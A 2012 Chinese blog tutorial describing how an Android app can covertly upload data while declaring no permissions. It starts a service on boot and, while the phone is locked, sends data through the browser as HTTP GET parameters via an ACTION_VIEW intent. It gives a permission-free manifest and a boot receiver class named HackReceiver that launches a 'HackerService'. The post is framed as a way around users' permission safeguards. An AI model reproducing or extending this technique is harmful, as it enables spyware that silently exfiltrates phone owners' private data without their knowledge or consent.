抛砖引玉之谁动了我的流量(0权限上传数据)
作者: 来源: 发布时间:2012-1-14 10:40:08 点击:
上次写过一篇文章 抛砖引玉 之 谁动了我的隐私(android用户隐私窥探) 描述如何读取系统log缓冲区但还存在权限提示问题。
这次来个稍微好点的,真正的0权限上传数据
同上次讲的一样,虽然大部分用户在安装app时对权限警告视而不见,但相信以后用户会对权限问题越来越重视的。
这次咱们先真正的来一次0权限上传热热身。
一、原理
首先利用的还是那个开机启动bug。
然后,在手机锁屏时上传数据。
如何上传数据呢,为了避免权限咱们得瞒天过海。
我们知道,在Intent转向的时候,可以转到标记为ACTION_VIEW的activity,而浏览器都有这个标记,可以传一个uri过去。
soga,说到这里,,明白了吧。就是使用http的GET传参,虽然只能传明文,但已经够了,更何况一次能传输的字节也还是很客观的。
至于传什么,每个想实现这种功能的人都有其目的吧。
二、实现
首先是清单文件,不需要声明任何权限,只需要写一个广播接收者和一个服务即可
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="org.igeek.hack"
android:versionCode="1"
android:versionName="1.0">
<uses-sdk android:minSdkVersion="8" />
<application android:icon="@drawable/icon" android:label="@string/app_name">
<receiver android:name =".reciver.HackReceiver">
<intent-filter android:priority ="1000">
<action android:name ="android.intent.action.BOOT_COMPLETED"/>
</intent-filter >
</receiver >
<service android:name=".service.HackerService"/>
</application>
</manifest>
然后就是广播接收者的实现,很简单,单纯的开启一个服务
package org.igeek.hack.reciver;
import org.igeek.hack.service.HackerService;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
/**
* @author 作者 E-mail:hangxin1940@gmail.com
* @version 创建时间:2012-01-13 下午10:32:21
* 类说明
*/
public class HackReceiver extends BroadcastReceiver {
@Override
public void onReceive(Context context, Intent intent) {
Intent it=new Intent(context, HackerService.class);
context.startService(it);
}
}
Tags:
抛砖引玉之谁动了我的流量(0权限上传数据)上一篇:20 个很有用的 CSS 图形和图表技术和教程 下一篇:
[收藏此文章]
